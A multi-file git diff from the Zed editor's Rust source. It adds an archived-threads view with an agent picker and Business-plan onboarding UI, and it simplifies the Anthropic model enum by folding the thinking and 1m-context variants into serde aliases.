+ let highlight_positions = highlight_positions.clone();
+ let title_label = if highlight_positions.is_empty() {
+ Label::new(title).truncate().flex_1().into_any_element()
+ } else {
+ HighlightedLabel::new(title, highlight_positions)
+ .truncate()
+ .flex_1()
+ .into_any_element()
+ };
+
+ h_flex()
+ .id(id)
+ .min_w_0()
+ .w_full()
+ .px(DynamicSpacing::Base06.rems(cx))
+ .border_1()
+ .map(|this| {
+ if is_focused {
+ this.border_color(cx.theme().colors().border_focused)
+ } else {
+ this.border_color(gpui::transparent_black())
+ }
+ })
+ .on_hover(cx.listener(move |this, is_hovered, _window, cx| {
+ if *is_hovered {
+ this.hovered_index = Some(ix);
+ } else if this.hovered_index == Some(ix) {
+ this.hovered_index = None;
+ }
+ cx.notify();
+ }))
+ .child(
+ v_flex()
+ .min_w_0()
+ .w_full()
+ .p_1()
+ .child(
+ h_flex()
+ .min_w_0()
+ .w_full()
+ .gap_1()
+ .justify_between()
+ .child(title_label)
+ .when(hovered || is_focused, |this| {
+ this.child(
+ h_flex()
+ .gap_0p5()
+ .when(can_unarchive, |this| {
+ this.child(
+ Button::new("unarchive-thread", "Restore")
+ .style(ButtonStyle::Filled)
+ .label_size(LabelSize::Small)
+ .when(is_focused, |this| {
+ this.key_binding(
+ KeyBinding::for_action_in(
+ &menu::Confirm,
+ &focus_handle,
+ cx,
+ )
+ .map(|kb| {
+ kb.size(rems_from_px(12.))
+ }),
+ )
+ })
+ .on_click(cx.listener(
+ move |this, _, window, cx| {
+ this.unarchive_thread(
+ session_info.clone(),
+ window,
+ cx,
+ );
+ },
+ )),
+ )
+ })
+ .when(supports_delete, |this| {
+ this.child(
+ IconButton::new(
+ "delete-thread",
+ IconName::Trash,
+ )
+ .style(ButtonStyle::Filled)
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted)
+ .tooltip({
+ move |_window, cx| {
+ Tooltip::for_action_in(
+ "Delete Thread",
+ &RemoveSelectedThread,
+ &focus_handle,
+ cx,
+ )
+ }
+ })
+ .on_click(cx.listener(
+ move |this, _, _, cx| {
+ this.delete_thread(
+ &session_id_for_delete,
+ cx,
+ );
+ cx.stop_propagation();
+ },
+ )),
+ )
+ }),
+ )
+ }),
+ )
+ .child(
+ h_flex()
+ .gap_1()
+ .when_some(timestamp, |this, ts| {
+ this.child(
+ Label::new(ts)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ })
+ .when_some(project_names, |this, project| {
+ this.child(
+ Label::new("•")
+ .size(LabelSize::Small)
+ .color(Color::Muted)
+ .alpha(0.5),
+ )
+ .child(
+ Label::new(project)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ }),
+ ),
+ )
+ .into_any_element()
+ }
+ }
+ }
+
+ fn render_agent_picker(&self, cx: &mut Context<Self>) -> PopoverMenu<ContextMenu> {
+ let agent_server_store = self.agent_server_store.clone();
+
+ let (chevron_icon, icon_color) = if self.selected_agent_menu.is_deployed() {
+ (IconName::ChevronUp, Color::Accent)
+ } else {
+ (IconName::ChevronDown, Color::Muted)
+ };
+
+ let selected_agent_icon = if let Agent::Custom { id } = &self.selected_agent {
+ let store = agent_server_store.read(cx);
+ let icon = store.agent_icon(&id);
+
+ if let Some(icon) = icon {
+ Icon::from_external_svg(icon)
+ } else {
+ Icon::new(IconName::Sparkle)
+ }
+ .color(Color::Muted)
+ .size(IconSize::Small)
+ } else {
+ Icon::new(IconName::ZedAgent)
+ .color(Color::Muted)
+ .size(IconSize::Small)
+ };
+
+ let this = cx.weak_entity();
+
+ PopoverMenu::new("agent_history_menu")
+ .trigger(
+ ButtonLike::new("selected_agent")
+ .selected_style(ButtonStyle::Tinted(TintColor::Accent))
+ .child(
+ h_flex().gap_1().child(selected_agent_icon).child(
+ Icon::new(chevron_icon)
+ .color(icon_color)
+ .size(IconSize::XSmall),
+ ),
+ ),
+ )
+ .menu(move |window, cx| {
+ Some(ContextMenu::build(window, cx, |menu, _window, cx| {
+ menu.item(
+ ContextMenuEntry::new("Zed Agent")
+ .icon(IconName::ZedAgent)
+ .icon_color(Color::Muted)
+ .handler({
+ let this = this.clone();
+ move |window, cx| {
+ this.update(cx, |this, cx| {
+ this.set_selected_agent(Agent::NativeAgent, window, cx)
+ })
+ .ok();
+ }
+ }),
+ )
+ .separator()
+ .map(|mut menu| {
+ let agent_server_store = agent_server_store.read(cx);
+ let registry_store = project::AgentRegistryStore::try_global(cx);
+ let registry_store_ref = registry_store.as_ref().map(|s| s.read(cx));
+
+ struct AgentMenuItem {
+ id: AgentId,
+ display_name: SharedString,
+ }
+
+ let agent_items = agent_server_store
+ .external_agents()
+ .map(|agent_id| {
+ let display_name = agent_server_store
+ .agent_display_name(agent_id)
+ .or_else(|| {
+ registry_store_ref
+ .as_ref()
+ .and_then(|store| store.agent(agent_id))
+ .map(|a| a.name().clone())
+ })
+ .unwrap_or_else(|| agent_id.0.clone());
+ AgentMenuItem {
+ id: agent_id.clone(),
+ display_name,
+ }
+ })
+ .sorted_unstable_by_key(|e| e.display_name.to_lowercase())
+ .collect::<Vec<_>>();
+
+ for item in &agent_items {
+ let mut entry = ContextMenuEntry::new(item.display_name.clone());
+
+ let icon_path = agent_server_store.agent_icon(&item.id).or_else(|| {
+ registry_store_ref
+ .as_ref()
+ .and_then(|store| store.agent(&item.id))
+ .and_then(|a| a.icon_path().cloned())
+ });
+
+ if let Some(icon_path) = icon_path {
+ entry = entry.custom_icon_svg(icon_path);
+ } else {
+ entry = entry.icon(IconName::ZedAgent);
+ }
+
+ entry = entry.icon_color(Color::Muted).handler({
+ let this = this.clone();
+ let agent = Agent::Custom {
+ id: item.id.clone(),
+ };
+ move |window, cx| {
+ this.update(cx, |this, cx| {
+ this.set_selected_agent(agent.clone(), window, cx)
+ })
+ .ok();
+ }
+ });
+
+ menu = menu.item(entry);
+ }
+ menu
+ })
+ }))
+ })
+ .with_handle(self.selected_agent_menu.clone())
+ .anchor(gpui::Corner::TopRight)
+ .offset(gpui::Point {
+ x: px(1.0),
+ y: px(1.0),
+ })
+ }
+
+ fn render_header(&self, window: &Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let has_query = !self.filter_editor.read(cx).text(cx).is_empty();
+ let traffic_lights = cfg!(target_os = "macos") && !window.is_fullscreen();
+ let header_height = platform_title_bar_height(window);
+ let show_focus_keybinding =
+ self.selection.is_some() && !self.filter_editor.focus_handle(cx).is_focused(window);
+
+ h_flex()
+ .h(header_height)
+ .mt_px()
+ .pb_px()
+ .when(traffic_lights, |this| {
+ this.pl(px(ui::utils::TRAFFIC_LIGHT_PADDING))
+ })
+ .pr_1p5()
+ .gap_1()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border)
+ .child(Divider::vertical().color(ui::DividerColor::Border))
+ .child(
+ h_flex()
+ .ml_1()
+ .min_w_0()
+ .w_full()
+ .gap_1()
+ .child(
+ Icon::new(IconName::MagnifyingGlass)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .child(self.filter_editor.clone()),
+ )
+ .when(show_focus_keybinding, |this| {
+ this.child(KeyBinding::for_action(&FocusSidebarFilter, cx))
+ })
+ .when(!has_query && !show_focus_keybinding, |this| {
+ this.child(self.render_agent_picker(cx))
+ })
+ .when(has_query, |this| {
+ this.child(
+ IconButton::new("clear_filter", IconName::Close)
+ .icon_size(IconSize::Small)
+ .tooltip(Tooltip::text("Clear Search"))
+ .on_click(cx.listener(|this, _, window, cx| {
+ this.reset_filter_editor_text(window, cx);
+ this.update_items(cx);
+ })),
+ )
+ })
+ }
+}
+
+pub fn format_history_entry_timestamp(entry_time: DateTime<Utc>) -> String {
+ let now = Utc::now();
+ let duration = now.signed_duration_since(entry_time);
+
+ let minutes = duration.num_minutes();
+ let hours = duration.num_hours();
+ let days = duration.num_days();
+ let weeks = days / 7;
+ let months = days / 30;
+
+ if minutes < 60 {
+ format!("{}m", minutes.max(1))
+ } else if hours < 24 {
+ format!("{}h", hours.max(1))
+ } else if days < 7 {
+ format!("{}d", days.max(1))
+ } else if weeks < 4 {
+ format!("{}w", weeks.max(1))
+ } else {
+ format!("{}mo", months.max(1))
+ }
+}
+
+impl Focusable for ThreadsArchiveView {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+}
+
+impl ThreadsArchiveView {
+ fn empty_state_message(&self, is_empty: bool, has_query: bool) -> Option<&'static str> {
+ archive_empty_state_message(self.history.is_some(), is_empty, has_query)
+ }
+}
+
+impl Render for ThreadsArchiveView {
+ fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let is_empty = self.items.is_empty();
+ let has_query = !self.filter_editor.read(cx).text(cx).is_empty();
+
+ let content = if self.is_loading {
+ v_flex()
+ .flex_1()
+ .justify_center()
+ .items_center()
+ .child(
+ Icon::new(IconName::LoadCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ .with_rotate_animation(2),
+ )
+ .into_any_element()
+ } else if let Some(message) = self.empty_state_message(is_empty, has_query) {
+ v_flex()
+ .flex_1()
+ .justify_center()
+ .items_center()
+ .child(
+ Label::new(message)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ } else {
+ v_flex()
+ .flex_1()
+ .overflow_hidden()
+ .child(
+ list(
+ self.list_state.clone(),
+ cx.processor(Self::render_list_entry),
+ )
+ .flex_1()
+ .size_full(),
+ )
+ .vertical_scrollbar_for(&self.list_state, window, cx)
+ .into_any_element()
+ };
+
+ v_flex()
+ .key_context("ThreadsArchiveView")
+ .track_focus(&self.focus_handle)
+ .on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_previous))
+ .on_action(cx.listener(Self::editor_move_down))
+ .on_action(cx.listener(Self::editor_move_up))
+ .on_action(cx.listener(Self::select_first))
+ .on_action(cx.listener(Self::select_last))
+ .on_action(cx.listener(Self::confirm))
+ .on_action(cx.listener(Self::remove_selected_thread))
+ .size_full()
+ .child(self.render_header(window, cx))
+ .child(content)
+ }
+}
+
+#[cfg(test)]
+mod tests {
+ use super::archive_empty_state_message;
+
+ #[test]
+ fn empty_state_message_returns_none_when_archive_has_items() {
+ assert_eq!(archive_empty_state_message(false, false, false), None);
+ assert_eq!(archive_empty_state_message(true, false, true), None);
+ }
+
+ #[test]
+ fn empty_state_message_distinguishes_unsupported_history() {
+ assert_eq!(
+ archive_empty_state_message(false, true, false),
+ Some("This agent does not support viewing archived threads.")
+ );
+ assert_eq!(
+ archive_empty_state_message(false, true, true),
+ Some("This agent does not support viewing archived threads.")
+ );
+ }
+
+ #[test]
+ fn empty_state_message_distinguishes_empty_history_and_search_results() {
+ assert_eq!(
+ archive_empty_state_message(true, true, false),
+ Some("No archived threads yet.")
+ );
+ assert_eq!(
+ archive_empty_state_message(true, true, true),
+ Some("No threads match your search.")
+ );
+ }
+}
@@ -1,8 +1,8 @@
+use agent_servers::GEMINI_ID;
use gpui::{
ClickEvent, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, Render,
linear_color_stop, linear_gradient,
};
-use project::agent_server_store::GEMINI_NAME;
use ui::{TintColor, Vector, VectorName, prelude::*};
use workspace::{ModalView, Workspace};
@@ -39,7 +39,7 @@ impl AcpOnboardingModal {
panel.update(cx, |panel, cx| {
panel.new_agent_thread(
AgentType::Custom {
- name: GEMINI_NAME.into(),
+ id: GEMINI_ID.into(),
},
window,
cx,
@@ -193,15 +193,16 @@ impl Render for AcpOnboardingModal {
let copy = "Bring the agent of your choice to Zed via our new Agent Client Protocol (ACP), starting with Google's Gemini CLI integration.";
let open_panel_button = Button::new("open-panel", "Start with Gemini CLI")
- .icon_size(IconSize::Indicator)
.style(ButtonStyle::Tinted(TintColor::Accent))
.full_width()
.on_click(cx.listener(Self::open_panel));
let docs_button = Button::new("add-other-agents", "Add Other Agents")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.full_width()
.on_click(cx.listener(Self::open_agent_registry));
@@ -1,8 +1,8 @@
+use agent_servers::CLAUDE_AGENT_ID;
use gpui::{
ClickEvent, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, MouseDownEvent, Render,
linear_color_stop, linear_gradient,
};
-use project::agent_server_store::CLAUDE_AGENT_NAME;
use ui::{TintColor, Vector, VectorName, prelude::*};
use workspace::{ModalView, Workspace};
@@ -39,7 +39,7 @@ impl ClaudeCodeOnboardingModal {
panel.update(cx, |panel, cx| {
panel.new_agent_thread(
AgentType::Custom {
- name: CLAUDE_AGENT_NAME.into(),
+ id: CLAUDE_AGENT_ID.into(),
},
window,
cx,
@@ -201,15 +201,16 @@ impl Render for ClaudeCodeOnboardingModal {
let copy = "Powered by the Agent Client Protocol, you can now run Claude Agent as\na first-class citizen in Zed's agent panel.";
let open_panel_button = Button::new("open-panel", "Start with Claude Agent")
- .icon_size(IconSize::Indicator)
.style(ButtonStyle::Tinted(TintColor::Accent))
.full_width()
.on_click(cx.listener(Self::open_panel));
let docs_button = Button::new("add-other-agents", "Add Other Agents")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Indicator)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Indicator)
+ .color(Color::Muted),
+ )
.full_width()
.on_click(cx.listener(Self::view_docs));
@@ -4,20 +4,31 @@ use ui::{prelude::*, render_modifiers};
#[derive(IntoElement)]
pub struct HoldForDefault {
is_default: bool,
+ more_content: bool,
}
impl HoldForDefault {
pub fn new(is_default: bool) -> Self {
- Self { is_default }
+ Self {
+ is_default,
+ more_content: true,
+ }
+ }
+
+ pub fn more_content(mut self, more_content: bool) -> Self {
+ self.more_content = more_content;
+ self
}
}
impl RenderOnce for HoldForDefault {
fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
h_flex()
- .pt_1()
- .border_t_1()
- .border_color(cx.theme().colors().border_variant)
+ .when(self.more_content, |this| {
+ this.pt_1()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ })
.gap_0p5()
.text_sm()
.text_color(Color::Muted.color(cx))
@@ -13,6 +13,8 @@ use theme::ThemeSettings;
use ui::{ButtonLike, TintColor, Tooltip, prelude::*};
use workspace::{OpenOptions, Workspace};
+use crate::Agent;
+
#[derive(IntoElement)]
pub struct MentionCrease {
id: ElementId,
@@ -187,7 +189,8 @@ fn open_mention_uri(
| MentionUri::Selection { abs_path: None, .. }
| MentionUri::Diagnostics { .. }
| MentionUri::TerminalSelection { .. }
- | MentionUri::GitDiff { .. } => {}
+ | MentionUri::GitDiff { .. }
+ | MentionUri::MergeConflict { .. } => {}
});
}
@@ -274,8 +277,17 @@ fn open_thread(
return;
};
+ // Right now we only support loading threads in the native agent
panel.update(cx, |panel, cx| {
- panel.load_agent_thread(id, None, Some(name.into()), window, cx)
+ panel.load_agent_thread(
+ Agent::NativeAgent,
+ id,
+ None,
+ Some(name.into()),
+ true,
+ window,
+ cx,
+ )
});
}
@@ -266,6 +266,20 @@ impl ZedAiOnboarding {
.into_any_element()
}
+ fn render_business_plan_state(&self, _cx: &mut App) -> AnyElement {
+ v_flex()
+ .gap_1()
+ .child(Headline::new("Welcome to Zed Business"))
+ .child(
+ Label::new("Here's what you get:")
+ .color(Color::Muted)
+ .mb_2(),
+ )
+ .child(PlanDefinitions.business_plan())
+ .children(self.render_dismiss_button())
+ .into_any_element()
+ }
+
fn render_student_plan_state(&self, _cx: &mut App) -> AnyElement {
v_flex()
.gap_1()
@@ -289,6 +303,7 @@ impl RenderOnce for ZedAiOnboarding {
Some(Plan::ZedFree) => self.render_free_plan_state(cx),
Some(Plan::ZedProTrial) => self.render_trial_state(cx),
Some(Plan::ZedPro) => self.render_pro_plan_state(cx),
+ Some(Plan::ZedBusiness) => self.render_business_plan_state(cx),
Some(Plan::ZedStudent) => self.render_student_plan_state(cx),
}
} else {
@@ -353,6 +368,14 @@ impl Component for ZedAiOnboarding {
"Pro Plan",
onboarding(SignInStatus::SignedIn, Some(Plan::ZedPro), false),
),
+ single_example(
+ "Business Plan",
+ onboarding(SignInStatus::SignedIn, Some(Plan::ZedBusiness), false),
+ ),
+ single_example(
+ "Student Plan",
+ onboarding(SignInStatus::SignedIn, Some(Plan::ZedStudent), false),
+ ),
])
.into_any_element(),
)
@@ -250,6 +250,15 @@ impl RenderOnce for AiUpsellCard {
.mb_2(),
)
.child(PlanDefinitions.pro_plan()),
+ Some(Plan::ZedBusiness) => card
+ .child(certified_user_stamp)
+ .child(Label::new("You're in the Zed Business plan").size(LabelSize::Large))
+ .child(
+ Label::new("Here's what you get:")
+ .color(Color::Muted)
+ .mb_2(),
+ )
+ .child(PlanDefinitions.business_plan()),
Some(Plan::ZedStudent) => card
.child(certified_user_stamp)
.child(Label::new("You're in the Zed Student plan").size(LabelSize::Large))
@@ -368,6 +377,28 @@ impl Component for AiUpsellCard {
}
.into_any_element(),
),
+ single_example(
+ "Business Plan",
+ AiUpsellCard {
+ sign_in_status: SignInStatus::SignedIn,
+ sign_in: Arc::new(|_, _| {}),
+ account_too_young: false,
+ user_plan: Some(Plan::ZedBusiness),
+ tab_index: Some(1),
+ }
+ .into_any_element(),
+ ),
+ single_example(
+ "Student Plan",
+ AiUpsellCard {
+ sign_in_status: SignInStatus::SignedIn,
+ sign_in: Arc::new(|_, _| {}),
+ account_too_young: false,
+ user_plan: Some(Plan::ZedStudent),
+ tab_index: Some(1),
+ }
+ .into_any_element(),
+ ),
],
))
.into_any_element(),
@@ -36,6 +36,12 @@ impl PlanDefinitions {
.child(ListBulletItem::new("Usage-based billing beyond $5"))
}
+ pub fn business_plan(&self) -> impl IntoElement {
+ List::new()
+ .child(ListBulletItem::new("Unlimited edit predictions"))
+ .child(ListBulletItem::new("Usage-based billing"))
+ }
+
pub fn student_plan(&self) -> impl IntoElement {
List::new()
.child(ListBulletItem::new("Unlimited edit predictions"))
@@ -23,7 +23,6 @@ http_client.workspace = true
schemars = { workspace = true, optional = true }
serde.workspace = true
serde_json.workspace = true
-settings.workspace = true
strum.workspace = true
thiserror.workspace = true
@@ -8,7 +8,6 @@ use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::B
use http_client::http::{self, HeaderMap, HeaderValue};
use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, StatusCode};
use serde::{Deserialize, Serialize};
-pub use settings::{AnthropicAvailableModel as AvailableModel, ModelMode};
use strum::{EnumIter, EnumString};
use thiserror::Error;
@@ -34,116 +33,84 @@ pub enum AnthropicModelMode {
Thinking {
budget_tokens: Option<u32>,
},
-}
-
-impl From<ModelMode> for AnthropicModelMode {
- fn from(value: ModelMode) -> Self {
- match value {
- ModelMode::Default => AnthropicModelMode::Default,
- ModelMode::Thinking { budget_tokens } => AnthropicModelMode::Thinking { budget_tokens },
- }
- }
-}
-
-impl From<AnthropicModelMode> for ModelMode {
- fn from(value: AnthropicModelMode) -> Self {
- match value {
- AnthropicModelMode::Default => ModelMode::Default,
- AnthropicModelMode::Thinking { budget_tokens } => ModelMode::Thinking { budget_tokens },
- }
- }
+ AdaptiveThinking,
}
#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))]
#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)]
pub enum Model {
- #[serde(rename = "claude-opus-4", alias = "claude-opus-4-latest")]
- ClaudeOpus4,
- #[serde(rename = "claude-opus-4-1", alias = "claude-opus-4-1-latest")]
- ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-thinking",
+ rename = "claude-opus-4",
+ alias = "claude-opus-4-latest",
+ alias = "claude-opus-4-thinking",
alias = "claude-opus-4-thinking-latest"
)]
- ClaudeOpus4Thinking,
+ ClaudeOpus4,
#[serde(
- rename = "claude-opus-4-1-thinking",
+ rename = "claude-opus-4-1",
+ alias = "claude-opus-4-1-latest",
+ alias = "claude-opus-4-1-thinking",
alias = "claude-opus-4-1-thinking-latest"
)]
- ClaudeOpus4_1Thinking,
- #[serde(rename = "claude-opus-4-5", alias = "claude-opus-4-5-latest")]
- ClaudeOpus4_5,
+ ClaudeOpus4_1,
#[serde(
- rename = "claude-opus-4-5-thinking",
+ rename = "claude-opus-4-5",
+ alias = "claude-opus-4-5-latest",
+ alias = "claude-opus-4-5-thinking",
alias = "claude-opus-4-5-thinking-latest"
)]
- ClaudeOpus4_5Thinking,
- #[serde(rename = "claude-opus-4-6", alias = "claude-opus-4-6-latest")]
- ClaudeOpus4_6,
- #[serde(
- rename = "claude-opus-4-6-thinking",
- alias = "claude-opus-4-6-thinking-latest"
- )]
- ClaudeOpus4_6Thinking,
- #[serde(
- rename = "claude-opus-4-6-1m-context",
- alias = "claude-opus-4-6-1m-context-latest"
- )]
- ClaudeOpus4_6_1mContext,
+ ClaudeOpus4_5,
#[serde(
- rename = "claude-opus-4-6-1m-context-thinking",
+ rename = "claude-opus-4-6",
+ alias = "claude-opus-4-6-latest",
+ alias = "claude-opus-4-6-1m-context",
+ alias = "claude-opus-4-6-1m-context-latest",
+ alias = "claude-opus-4-6-thinking",
+ alias = "claude-opus-4-6-thinking-latest",
+ alias = "claude-opus-4-6-1m-context-thinking",
alias = "claude-opus-4-6-1m-context-thinking-latest"
)]
- ClaudeOpus4_6_1mContextThinking,
- #[serde(rename = "claude-sonnet-4", alias = "claude-sonnet-4-latest")]
- ClaudeSonnet4,
+ ClaudeOpus4_6,
#[serde(
- rename = "claude-sonnet-4-thinking",
+ rename = "claude-sonnet-4",
+ alias = "claude-sonnet-4-latest",
+ alias = "claude-sonnet-4-thinking",
alias = "claude-sonnet-4-thinking-latest"
)]
- ClaudeSonnet4Thinking,
- #[serde(rename = "claude-sonnet-4-5", alias = "claude-sonnet-4-5-latest")]
- ClaudeSonnet4_5,
+ ClaudeSonnet4,
#[serde(
- rename = "claude-sonnet-4-5-thinking",
+ rename = "claude-sonnet-4-5",
+ alias = "claude-sonnet-4-5-latest",
+ alias = "claude-sonnet-4-5-thinking",
alias = "claude-sonnet-4-5-thinking-latest"
)]
- ClaudeSonnet4_5Thinking,
+ ClaudeSonnet4_5,
#[serde(
rename = "claude-sonnet-4-5-1m-context",
- alias = "claude-sonnet-4-5-1m-context-latest"
- )]
- ClaudeSonnet4_5_1mContext,
- #[serde(
- rename = "claude-sonnet-4-5-1m-context-thinking",
+ alias = "claude-sonnet-4-5-1m-context-latest",
+ alias = "claude-sonnet-4-5-1m-context-thinking",
alias = "claude-sonnet-4-5-1m-context-thinking-latest"
)]
- ClaudeSonnet4_5_1mContextThinking,
+ ClaudeSonnet4_5_1mContext,
#[default]
- #[serde(rename = "claude-sonnet-4-6", alias = "claude-sonnet-4-6-latest")]
- ClaudeSonnet4_6,
#[serde(
- rename = "claude-sonnet-4-6-thinking",
- alias = "claude-sonnet-4-6-thinking-latest"
- )]
- ClaudeSonnet4_6Thinking,
- #[serde(
- rename = "claude-sonnet-4-6-1m-context",
- alias = "claude-sonnet-4-6-1m-context-latest"
- )]
- ClaudeSonnet4_6_1mContext,
- #[serde(
- rename = "claude-sonnet-4-6-1m-context-thinking",
+ rename = "claude-sonnet-4-6",
+ alias = "claude-sonnet-4-6-latest",
+ alias = "claude-sonnet-4-6-1m-context",
+ alias = "claude-sonnet-4-6-1m-context-latest",
+ alias = "claude-sonnet-4-6-thinking",
+ alias = "claude-sonnet-4-6-thinking-latest",
+ alias = "claude-sonnet-4-6-1m-context-thinking",
alias = "claude-sonnet-4-6-1m-context-thinking-latest"
)]
- ClaudeSonnet4_6_1mContextThinking,
- #[serde(rename = "claude-haiku-4-5", alias = "claude-haiku-4-5-latest")]
- ClaudeHaiku4_5,
+ ClaudeSonnet4_6,
#[serde(
- rename = "claude-haiku-4-5-thinking",
+ rename = "claude-haiku-4-5",
+ alias = "claude-haiku-4-5-latest",
+ alias = "claude-haiku-4-5-thinking",
alias = "claude-haiku-4-5-thinking-latest"
)]
- ClaudeHaiku4_5Thinking,
+ ClaudeHaiku4_5,
#[serde(rename = "claude-3-haiku", alias = "claude-3-haiku-latest")]
Claude3Haiku,
#[serde(rename = "custom")]
@@ -171,38 +138,14 @@ impl Model {
}
pub fn from_id(id: &str) -> Result<Self> {
- if id.starts_with("claude-opus-4-6-1m-context-thinking") {
- return Ok(Self::ClaudeOpus4_6_1mContextThinking);
- }
-
- if id.starts_with("claude-opus-4-6-1m-context") {
- return Ok(Self::ClaudeOpus4_6_1mContext);
- }
-
- if id.starts_with("claude-opus-4-6-thinking") {
- return Ok(Self::ClaudeOpus4_6Thinking);
- }
-
if id.starts_with("claude-opus-4-6") {
return Ok(Self::ClaudeOpus4_6);
}
- if id.starts_with("claude-opus-4-5-thinking") {
- return Ok(Self::ClaudeOpus4_5Thinking);
- }
-
if id.starts_with("claude-opus-4-5") {
return Ok(Self::ClaudeOpus4_5);
}
- if id.starts_with("claude-opus-4-1-thinking") {
- return Ok(Self::ClaudeOpus4_1Thinking);
- }
-
- if id.starts_with("claude-opus-4-thinking") {
- return Ok(Self::ClaudeOpus4Thinking);
- }
-
if id.starts_with("claude-opus-4-1") {
return Ok(Self::ClaudeOpus4_1);
}
@@ -211,50 +154,22 @@ impl Model {
return Ok(Self::ClaudeOpus4);
}
- if id.starts_with("claude-sonnet-4-6-1m-context-thinking") {
- return Ok(Self::ClaudeSonnet4_6_1mContextThinking);
- }
-
- if id.starts_with("claude-sonnet-4-6-1m-context") {
- return Ok(Self::ClaudeSonnet4_6_1mContext);
- }
-
- if id.starts_with("claude-sonnet-4-6-thinking") {
- return Ok(Self::ClaudeSonnet4_6Thinking);
- }
-
if id.starts_with("claude-sonnet-4-6") {
return Ok(Self::ClaudeSonnet4_6);
}
- if id.starts_with("claude-sonnet-4-5-1m-context-thinking") {
- return Ok(Self::ClaudeSonnet4_5_1mContextThinking);
- }
-
if id.starts_with("claude-sonnet-4-5-1m-context") {
return Ok(Self::ClaudeSonnet4_5_1mContext);
}
- if id.starts_with("claude-sonnet-4-5-thinking") {
- return Ok(Self::ClaudeSonnet4_5Thinking);
- }
-
if id.starts_with("claude-sonnet-4-5") {
return Ok(Self::ClaudeSonnet4_5);
}
- if id.starts_with("claude-sonnet-4-thinking") {
- return Ok(Self::ClaudeSonnet4Thinking);
- }
-
if id.starts_with("claude-sonnet-4") {
return Ok(Self::ClaudeSonnet4);
}
- if id.starts_with("claude-haiku-4-5-thinking") {
- return Ok(Self::ClaudeHaiku4_5Thinking);
- }
-
if id.starts_with("claude-haiku-4-5") {
return Ok(Self::ClaudeHaiku4_5);
}
@@ -270,30 +185,13 @@ impl Model {
match self {
Self::ClaudeOpus4 => "claude-opus-4-latest",
Self::ClaudeOpus4_1 => "claude-opus-4-1-latest",
- Self::ClaudeOpus4Thinking => "claude-opus-4-thinking-latest",
- Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-thinking-latest",
Self::ClaudeOpus4_5 => "claude-opus-4-5-latest",
- Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-thinking-latest",
Self::ClaudeOpus4_6 => "claude-opus-4-6-latest",
- Self::ClaudeOpus4_6Thinking => "claude-opus-4-6-thinking-latest",
- Self::ClaudeOpus4_6_1mContext => "claude-opus-4-6-1m-context-latest",
- Self::ClaudeOpus4_6_1mContextThinking => "claude-opus-4-6-1m-context-thinking-latest",
Self::ClaudeSonnet4 => "claude-sonnet-4-latest",
- Self::ClaudeSonnet4Thinking => "claude-sonnet-4-thinking-latest",
Self::ClaudeSonnet4_5 => "claude-sonnet-4-5-latest",
- Self::ClaudeSonnet4_5Thinking => "claude-sonnet-4-5-thinking-latest",
Self::ClaudeSonnet4_5_1mContext => "claude-sonnet-4-5-1m-context-latest",
- Self::ClaudeSonnet4_5_1mContextThinking => {
- "claude-sonnet-4-5-1m-context-thinking-latest"
- }
Self::ClaudeSonnet4_6 => "claude-sonnet-4-6-latest",
- Self::ClaudeSonnet4_6Thinking => "claude-sonnet-4-6-thinking-latest",
- Self::ClaudeSonnet4_6_1mContext => "claude-sonnet-4-6-1m-context-latest",
- Self::ClaudeSonnet4_6_1mContextThinking => {
- "claude-sonnet-4-6-1m-context-thinking-latest"
- }
Self::ClaudeHaiku4_5 => "claude-haiku-4-5-latest",
- Self::ClaudeHaiku4_5Thinking => "claude-haiku-4-5-thinking-latest",
Self::Claude3Haiku => "claude-3-haiku-20240307",
Self::Custom { name, .. } => name,
}
@@ -302,23 +200,14 @@ impl Model {
/// The id of the model that should be used for making API requests
pub fn request_id(&self) -> &str {
match self {
- Self::ClaudeOpus4 | Self::ClaudeOpus4Thinking => "claude-opus-4-20250514",
- Self::ClaudeOpus4_1 | Self::ClaudeOpus4_1Thinking => "claude-opus-4-1-20250805",
- Self::ClaudeOpus4_5 | Self::ClaudeOpus4_5Thinking => "claude-opus-4-5-20251101",
- Self::ClaudeOpus4_6
- | Self::ClaudeOpus4_6Thinking
- | Self::ClaudeOpus4_6_1mContext
- | Self::ClaudeOpus4_6_1mContextThinking => "claude-opus-4-6",
- Self::ClaudeSonnet4 | Self::ClaudeSonnet4Thinking => "claude-sonnet-4-20250514",
- Self::ClaudeSonnet4_5
- | Self::ClaudeSonnet4_5Thinking
- | Self::ClaudeSonnet4_5_1mContext
- | Self::ClaudeSonnet4_5_1mContextThinking => "claude-sonnet-4-5-20250929",
- Self::ClaudeSonnet4_6
- | Self::ClaudeSonnet4_6Thinking
- | Self::ClaudeSonnet4_6_1mContext
- | Self::ClaudeSonnet4_6_1mContextThinking => "claude-sonnet-4-6",
